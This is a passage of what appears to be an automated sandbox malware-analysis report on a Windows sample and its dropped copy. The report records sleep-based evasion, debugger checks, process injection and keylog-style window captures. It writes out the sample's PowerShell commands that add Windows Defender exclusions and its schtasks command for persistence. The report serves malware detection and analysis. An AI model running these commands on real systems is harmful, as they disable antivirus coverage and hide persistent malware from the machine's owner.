                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6244Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 4088Thread sleep count: 252 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 4088Thread sleep time: -126000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328Thread sleep count: 409 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328Thread sleep time: -1227000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328Thread sleep count: 9065 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328Thread sleep time: -27195000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe TID: 4196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001078000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]17_2_004432B5
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00412077 GetProcessHeap,HeapFree,17_2_00412077
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00434B47 SetUnhandledExceptionFilter,17_2_00434B47
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB22
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00434FDC
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMemory written: C:\Users\user\AppData\Roaming\jdSldfVS.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_004120F7
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00419627 mouse_event,17_2_00419627
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeProcess created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"Jump to behavior
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPV\9`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPV\]`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPV\13B`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPV\
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB~P
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00434C52 cpuid 17_2_00434C52
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: EnumSystemLocalesW,17_2_00452036
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoW,17_2_00452313
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: EnumSystemLocalesW,17_2_00448404
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoW,17_2_00452543
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoA,17_2_0040F8D1
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: GetLocaleInfoW,17_2_004488ED
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00451CD8
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: EnumSystemLocalesW,17_2_00451F50
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: EnumSystemLocalesW,17_2_00451F9B
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
